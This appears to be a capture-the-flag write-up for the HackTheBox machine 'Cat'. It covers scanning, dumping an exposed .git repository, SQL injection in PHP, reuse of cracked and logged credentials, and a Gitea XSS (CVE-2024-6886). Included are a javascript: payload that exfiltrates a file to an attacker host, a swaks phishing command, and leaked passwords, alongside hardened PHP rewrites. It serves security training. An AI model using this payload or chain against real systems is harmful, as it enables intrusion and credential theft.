Enum

$ rustscan --ulimit 10000 -a <IP> -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
 
[~] Automatically increasing ulimit value to 10000.
Open <IP>:22
Open <IP>:80
 
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEmL+UFD1eC5+aMAOZGipV3cuvXzPFlhqtKj7yVlVwXFN92zXioVTMYVBaivGHf3xmPFInqiVmvsOy3w4TsRja4=
|   256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEOCpb672fivSz3OLXzut3bkFzO4l6xH57aWuSu4RikE
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-git:
|   <IP>:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Cat v1
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Best Cat Competition
  • .git exposed: dump it with git-dumper
$ python -m venv env
$ source env/bin/activate
$ pip install git-dumper
$ git-dumper http://cat.htb/.git cat
 
$ ls cat/
accept_cat.php  config.php   css             img          index.php  logout.php    vote.php  winners.php
admin.php       contest.php  delete_cat.php  img_winners  join.php   view_cat.php  winners
 
$ cat cat/admin.php
<?php
session_start();
 
include 'config.php';
 
// Check if the user is logged in
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
    header("Location: /join.php");
    exit();
}
 
*snip*
$ cat cat/accept_cat.php
<?php
include 'config.php';
session_start();
 
if (isset($_SESSION['username']) && $_SESSION['username'] === 'axel') {
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        if (isset($_POST['catId']) && isset($_POST['catName'])) {
            $cat_name = $_POST['catName'];
            $catId = $_POST['catId'];
            $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
            $pdo->exec($sql_insert);
 
            $stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
            $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
            $stmt_delete->execute();
 
            echo "The cat has been accepted and added successfully.";
        } else {
            echo "Error: Cat ID or Cat Name not provided.";
        }
    } else {
        header("Location: /");
        exit();
    }
} else {
    echo "Access denied.";
}
  • Seems to check the session for user “axel”; XSS might do the trick

  • Deepseek R1:

1. **SQL Injection**:
   - The code directly uses user input (`$_POST['catId']` and `$_POST['catName']`) in SQL statements without proper sanitization.
   - This allows an attacker to manipulate the SQL query, potentially leading to unauthorized database access or modifications.
 
2. **Missing Parameter Binding**:
   - In the delete statement (`$stmt_delete->prepare("DELETE FROM cats WHERE cat_id = :cat_id"`), the `:cat_id` parameter is not properly bound using `PDO::PARAM_INT`, which could allow injection if the input isn't validated as an integer.
 
3. **Lack of Input Validation**:
   - There's no validation to ensure that `$_POST['catId']` and `$_POST['catName']` are numeric and within acceptable ranges, making it easier for an attacker to manipulate the inputs.
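For contrast, a hardened rewrite of accept_cat.php, added here as an example (not the box's code); it assumes config.php supplies the connected PDO instance in $pdo, as the original does:

```php
<?php
// Hardened rewrite of accept_cat.php (example, not the original box code).
// Assumes config.php provides a connected PDO instance in $pdo.
session_start();
include 'config.php';

// Same authorization check as the original, declared up front.
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
    http_response_code(403);
    exit('Access denied.');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Location: /');
    exit();
}

// Validate shape before touching the database: catId must be a positive
// integer, catName a bounded, non-empty string.
$catId   = filter_input(INPUT_POST, 'catId', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
$catName = trim((string)($_POST['catName'] ?? ''));
if ($catId === false || $catId === null || $catName === '' || mb_strlen($catName) > 64) {
    http_response_code(400);
    exit('Error: Cat ID or Cat Name not provided.');
}

$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
try {
    // Both statements are parameterised. The original interpolated $cat_name
    // straight into the INSERT, which is the injection point used on the box.
    $pdo->beginTransaction();
    $ins = $pdo->prepare('INSERT INTO accepted_cats (name) VALUES (:name)');
    $ins->bindValue(':name', $catName, PDO::PARAM_STR);
    $ins->execute();

    $del = $pdo->prepare('DELETE FROM cats WHERE cat_id = :cat_id');
    $del->bindValue(':cat_id', $catId, PDO::PARAM_INT);
    $del->execute();
    $pdo->commit();
} catch (PDOException $e) {
    if ($pdo->inTransaction()) {
        $pdo->rollBack();
    }
    error_log('accept_cat failed: ' . $e->getMessage()); // log detail, never echo it
    http_response_code(500);
    exit('Error: could not accept cat.');
}

// The stored name is untrusted data: escape it on output.
echo 'The cat ' . htmlspecialchars($catName, ENT_QUOTES, 'UTF-8') . ' has been accepted and added successfully.';
```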
  • Seems XSS then SQLi is the way
+---------+-------------------------------+-------------------------------------------------------+----------+
| user_id | email                         | password                                              | username |
+---------+-------------------------------+-------------------------------------------------------+----------+
| 1       | axel2017@gmail.com            | d1bbba3670feb9435c9841e46e60ee2f                      | axel     |
| 2       | rosamendoza485@gmail.com      | ac369922d560f17d6eeb8b2c7dec498c (soyunaprincesarosa) | rosa     |
| 3       | robertcervantes2000@gmail.com | 42846631708f69c00ec0c0a8aa4a92ad                      | robert   |
| 4       | fabiancarachure2323@gmail.com | 39e153e825c4a3d314a0dc7f7475ddbe                      | fabian   |
| 5       | jerrysonC343@gmail.com        | 781593e060f8d065cd7281c5ec5b4b86                      | jerryson |
| 6       | larryP5656@gmail.com          | 1b6dce240bbfbc0905a664ad199e18f8                      | larry    |
| 7       | royer.royer2323@gmail.com     | c598f6b844a36fa7836fba0835f1f6                        | royer    |
| 8       | peterCC456@gmail.com          | e41ccefa439fc454f7eadbf1f139ed8a                      | peter    |
| 9       | angel234g@gmail.com           | 24a8ec003ac2e1b3c5953a6f95f8f565                      | angel    |
| 10      | jobert2020@gmail.com          | 88e4dceccd48820cf77b5cf6c08698ad                      | jobert   |
| 11      | asdf@adsf.com                 | 912ec803b2ce49e4a541068d495ab570 (asdf)               | XSS CMD  |
+---------+-------------------------------+-------------------------------------------------------+----------+
  • SSH as Rosa
$ ssh rosa@cat.htb
rosa@cat.htb's password: 'soyunaprincesarosa'
 
rosa@cat:~$ ls /home
axel  git  jobert  rosa
  • Apache2 server: check the logs
$ grep 'axel' /var/log/apache2 -R
*snip*
/var/log/apache2/access.log.1:127.0.0.1 - GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0

Creds

rosa : soyunaprincesarosa

axel : aNdZwgC4tI9gnVXv_e3Q

  • SSH as Axel, check mail
$ ssh axel@cat.htb
axel@cat.htb's password: aNdZwgC4tI9gnVXv_e3Q
 
You have mail.
 
axel@cat:~$ ls
user.txt
 
axel@cat:~$ cat /var/mail/axel
 
From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Subject: New cat services
 
Hi Axel,
 
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
 
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
 
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
 
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

Root

  • Check ports
axel@cat:~$ netstat -ano
 
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
  • Portfwd and access in browser
$ ssh -L 3000:127.0.0.1:3000 -L 25:127.0.0.1:25 axel@cat.htb
  • Can sign into Gitea as Axel

Pieces

“Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.”

http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md

Gitea 1.22 XSS CVE-2024-6886

  • Sounds like we need to go phishing. Target index.php, not README.md

  • Create repo and add XSS to description

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://<IP>:<PORT>/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">PWNED??</a>
  • Phish Jobert and catch the callback in an HTTP server (the repo gets deleted quickly, so spam it)
$ swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: pwned" --body "http://localhost:3000/axel/pwn" --server localhost --port 25 --timeout 10s
=== Trying localhost:25...
=== Connected to localhost.
<-  220 cat.htb ESMTP Sendmail 8.15.2/8.15.2/Debian-18; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]
 -> EHLO kali
<-  250-cat.htb Hello localhost [127.0.0.1], pleased to meet you
<-  250-ENHANCEDSTATUSCODES
<-  250-PIPELINING
<-  250-EXPN
<-  250-VERB
<-  250-8BITMIME
<-  250-SIZE
<-  250-DSN
<-  250-ETRN
<-  250-AUTH DIGEST-MD5 CRAM-MD5
<-  250-DELIVERBY
<-  250 HELP
 -> MAIL FROM:<axel@localhost>
<-  250 2.1.0 <axel@localhost>... Sender ok
 -> RCPT TO:<jobert@localhost>
<-  250 2.1.5 <jobert@localhost>... Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> To: jobert@localhost
 -> From: axel@localhost
 -> Subject: pwned
 -> Message-Id: <20250203203439.043552@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 ->
 -> http://localhost:3000/axel/pwn
 ->
 ->
 -> .
<-  250 2.0.0 5141Yd7W016129 Message accepted for delivery
 -> QUIT
<-  221 2.0.0 cat.htb closing connection
=== Connection closed with remote host.
# Response
 
GET /?response=%3C%3Fphp%0A%24valid_username%20%3D%20%27admin%27%3B%0A%24valid_password%20%3D%20%27IKw75eR0MR7CMIxhH0%27%3B%0A%0Aif%20(!isset(%24_SERVER%5B%27PHP_AUTH_USER%27%5D)%20%7C%7C%20!isset(%24_SERVER%5B%27PHP_AUTH_PW%27%5D)%20%7C%7C%20%0A%20%20%20%20%24_SERVER%5B%27PHP_AUTH_USER%27%5D%20!%3D%20%24valid_username%20%7C%7C%20%24_SERVER%5B%27PHP_AUTH_PW%27%5D%20!%3D%20%24valid_password)%20%7B%0A%20%20%20%20%0A%20%20%20%20header(%27WWW-Authenticate%3A%20Basic%20realm%3D%22Employee%20Management%22%27)%3B%0A%20%20%20%20header(%27HTTP%2F1.0%20401%20Unauthorized%27)%3B%0A%20%20%20%20exit%3B%0A%7D%0A%0Aheader(%27Location%3A%20dashboard.php%27)%3B%0Aexit%3B%0A%3F%3E%0A%0A HTTP/1.1 200 -
 
# URL Decode
<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
 
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
 
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}
 
header('Location: dashboard.php');
exit;
?>
 
HTTP/1.1" 200 -
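The decoded index.php above keeps the admin password in the repository (the same password works for root) and compares it with a plain !=. A hardened rewrite, added here as an example and not the repository's code; the environment variable name EMPLOYEE_MGMT_ADMIN_HASH is assumed:

```php
<?php
// Hardened rewrite of the Employee-management index.php (example, not the
// repository's code). The secret never lives in the repo: a bcrypt hash is
// read from the environment (EMPLOYEE_MGMT_ADMIN_HASH is an assumed name),
// and both comparisons are constant-time.
function basic_auth_ok(?string $user, ?string $pass, string $expectedUser, string $passwordHash): bool
{
    if ($user === null || $pass === null) {
        return false;
    }
    // hash_equals for the username, password_verify for the bcrypt hash;
    // evaluate both so timing does not reveal which one failed.
    $userOk = hash_equals($expectedUser, $user);
    $passOk = password_verify($pass, $passwordHash);
    return $userOk && $passOk;
}

// Hash generated once, out of band, with password_hash($secret, PASSWORD_BCRYPT).
$hash = getenv('EMPLOYEE_MGMT_ADMIN_HASH');
if ($hash === false || $hash === '') {
    http_response_code(500);
    exit('Authentication not configured.');
}

if (!basic_auth_ok($_SERVER['PHP_AUTH_USER'] ?? null, $_SERVER['PHP_AUTH_PW'] ?? null, 'admin', $hash)) {
    header('WWW-Authenticate: Basic realm="Employee Management"');
    http_response_code(401);
    exit;
}

header('Location: dashboard.php');
exit;
```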
  • su root
axel@cat:~$ su root
Password: IKw75eR0MR7CMIxhH0
 
root@cat:/home/axel: ls /root
root.txt  scripts